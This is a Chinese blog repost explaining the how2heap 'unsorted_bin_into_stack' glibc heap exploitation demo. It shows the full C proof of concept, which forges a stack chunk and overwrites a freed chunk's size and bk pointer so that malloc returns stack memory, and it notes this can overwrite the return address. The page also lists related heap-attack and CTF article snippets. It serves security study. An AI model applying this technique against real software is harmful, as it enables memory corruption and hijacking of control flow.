12.unsorted_bin_into_stack

最新推荐文章于 2022-04-17 23:11:26 发布
最新推荐文章于 2022-04-17 23:11:26 发布
阅读量234 收藏 2
点赞数
文章标签: 数据结构与算法
原文链接:http://www.cnblogs.com/pfcode/p/10994337.html
版权

源代码

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <stdint.h>
 4 
 5 int main() {
 6   intptr_t stack_buffer[4] = {0};
 7 
 8   fprintf(stderr, "Allocating the victim chunk\n");
 9   intptr_t* victim = malloc(0x100);
10 
11   fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
12   intptr_t* p1 = malloc(0x100);
13 
14   fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
15   free(victim);
16 
17   fprintf(stderr, "Create a fake chunk on the stack");
18   fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address");
19   stack_buffer[1] = 0x100 + 0x10;
20   stack_buffer[3] = (intptr_t)stack_buffer;
21 
22   //------------VULNERABILITY-----------
23   fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
24   fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
25   victim[-1] = 32;
26   victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
27   //------------------------------------
28 
29   fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
30   fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
31 }

运行结果

先在栈上申请4*8=36=0x20字节的空间stack

然后申请两个100字节的堆victim,p1

p1是防止victim释放后和top chunk合并

释放victim,大于fastbin要求,所以进入unsort bin

 

接着将stack伪造成一个堆

将stack的size赋值为0x110

 bk指向任意可写地址,这里将其指向stack起始地址

然后将堆victim的size修改为32=0x20字节   (要满足(> 16 on x64) && < av->system_mem)的要求

将victim的bk修改为指向stack

此时victim还在unsort bin中

unsorted bin实际是 victim->stack->null

此时再申请一个0x100字节的堆

首先到unsorted bin中寻找

先找到victim 由于victim0>size被修改为了0x20,不满足大小要求,遍历victim->bk所指堆

于是找到stack ,大小满足,bk所指也为可写空间,满足条件,所以从链表中取出stack来分配

这就利用了unsorted bin的特性,使堆分配到了栈里

如果此时可以向堆里写入内容,即可覆盖栈中变量即返回地址

 

转载于:https://www.cnblogs.com/pfcode/p/10994337.html

aaa15893831716
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
how2heap-2.23-06-unsorted_bin_into_stack
blind cat
01-04 388
和利用场景不一样,反而好理解一些。
常见堆攻击手段
For Geek
10-10 1525
fastbin利用 smallbin利用 unsortedbin利用 largebin利用
C++复习整理---指针、函数、const相关
DannieG的博客
10-13 124
指针int *p p:p指向的地址 *p:p指向的地址上的值 &p:存放指针p的地址 const const int p int const p 这两个相同的 指向整型常量的指针,指向的位置的值不能改变,可以改指针本身。理解成先const int或int const,再为指针。 就可以让这个指针指向有另一个值的另一个位置。 如果想要在同一个位置改值,就可以先让另一个指针指向这个位置,然后再从另一个指针改值。 比如: int u = (int)p;//得有(int),不然会提示是const int*
how2heap个人学习总结
u014377094的博客
04-17 617
how2heap个人学习总结 1.fastbin_dup double free基本操作 2.27下由于多了tcache,可以先free7个填满tcache再calloc3个后free放入fastbin。calloc与malloc区别除了对语法略有不同,会对内容初始化以外还会跳过tcache直接执行int_malloc。 后续2.31,32,33,34无区别。 2.fastbin_dup_into_stack double free基操,有一点需要注意,fast chunk在获取时会对其大小 进行检测,检查
linux的堆管理及攻击(ptmalloc)
weixin_45574485的博客
01-25 468
堆基础 堆简介 不同的平台有不同的堆内存管理机制,比如: 管理机制 对应的相关的平台 dlmalloc General purpose allocator ptmalloc2 glibc jemalloc FreeBSD and Firefox tcmalloc Google libumem Solaris 本来linux默认的是dlmalloc,但是由于其不支持多线程管理,后来被支持多线程的ptmalloc2代替了。接下来的内容都是基于ptmalloc机制进行的堆管理和
bfs.c.zip_bfs parallel_bitonic_out
09-20
THIS IS A BITONIC SEARCH PROGARM. A BITONIC SEARCH IS A PROGRAM THAT IS USED TO FIND OUT THE PARALLEL VALUES THAT ARE UNSORTED AND CAN BE REALIZED AT A TIME USING SEMAPHORE
Zd02.rar_数据结构_C#_
08-12
SSorted and unsorted sets representation classes
find_max_element_in_unsorted_LL_iterative
04-17
find_max_element_in_unsorted_LL_iterative问题: class ListNode { constructor(value = 0, next = null) { this.value = value this.next = next }} function findMax(head) { // Write your code here....
workout_tracker
03-08
需要在本地制作这些文件夹以存储训练图像:unsorted_images 火车/等级1 火车/班2 火车/等级3 并进行测试:test / raw_images collect_data_from_video.py开始与您的网络摄像头建立连接,并将每个帧保存到unsorted...
微软内部资料-SQL性能优化5
11-27
Contents Overview 1 Lesson 1: Index Concepts 3 Lesson 2: Concepts – Statistics 29 Lesson 3: Concepts – Query Optimization 37 Lesson 4: Information Collection and Analysis 61 Lesson 5: Formulating ...
ptmalloc堆内存管理机制(主要讨论Linux x86下32位系统)
xiaobai_aaa的博客
11-16 880
什么是堆? 在用户空间内(32位下为3G的空间),除过禁止访问空间(128M)、代码段、数据段、.bss段、栈、命令行参数及环境变量所占空间之外的空间都可以用做堆区,堆区的空间需要用户动态申请,那就不得不先介绍两个系统调用:brk()或者sbrk()和mmap()。brk()函数的C语言形式声明: void brk ( void end_data_segment); brk()函数的作
unsort bin attack -攻防世界 noleak
csdn546229768的博客
12-09 688
带着问题的学习是有效的 例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击) 在ida分析后得到以下结果: 总结: 1.用于保存chunk指针的bss数组最多存储10个 2.free时有double free、uaf漏洞 3.可以编辑free chunk数据,有堆溢出漏洞 4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法 没有开N
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4554
这是进入堆领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解堆的基础知识后有没有自己想过在堆中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
House Of Einherjar(2016 Seccon tinypad)
九层台
09-02 973
栗子https://github.com/tower111/software.git got表不可写:劫持程序执行流的思路1.复写hook函数。2.覆盖返回地址 canary和NX保护。 漏洞和数据结构 if ( v13 &gt; 0 &amp;&amp; v13 &lt;= 4 ) { if ( *(_QWORD *)&amp;tinypad[16 *...
glibc2.29下unsortedbin_attack的替代方法
合天网安学院
05-22 797
glibc2.29下unsortedbin_attack的替代方法国际生物多样性日固定布局 ...
Libc堆管理机制及漏洞利用技术 (一)
sdulibh的专栏
12-31 2449
0×01 Libc堆浅析 1.1 堆管理结构 struct malloc_state {  mutex_t mutex;                 /* Serialize access. */  int flags;                       /* Flags (formerly in max_fast). */  #if THREAD_STATS  /* Sta
13.unsorted_bin_attack
06-09 205
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into...
ciscn_2019_final_2(合并为unsortbin,doublefree)
m0_51251108的博客
11-02 446
ciscn_2019_final_2: 这题对我来说太难啦,写篇博文好好理理思路,如有错误,还望指正 参考师傅:ha1vk checksec一下 64位,保护全开 逆向分析: 主界面main函数: init函数: Sandbox_Loading()函数: 开了个沙盒,貌似啥都用不了了 allocate()函数: 说错啦,第三行字那里,复制可以帮我们改到size free函数: show函数: byebye函数: 大致思路: 堆利用用劫持_IO_2_1_stdin_结构体,修改文件描述符为66
这段程序的执行结果应该是:import pandas as pd unsorted_df = pd.DataFrame({'col1':[2,1,1,1],'col2':[1,3,2,4]}) sorted_df= unsorted_df.sort_values(by=['col1','col2']) print(sorted_df)
最新发布
05-31
首先创建了一个 DataFrame unsorted_df,它包含了 4 行 2 列的数据。然后使用 sort_values 方法按照 'col1' 和 'col2' 进行排序,并将结果赋值给 sorted_df。排序后,DataFrame 的第 1 列按照升序排列,如果第 1 列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值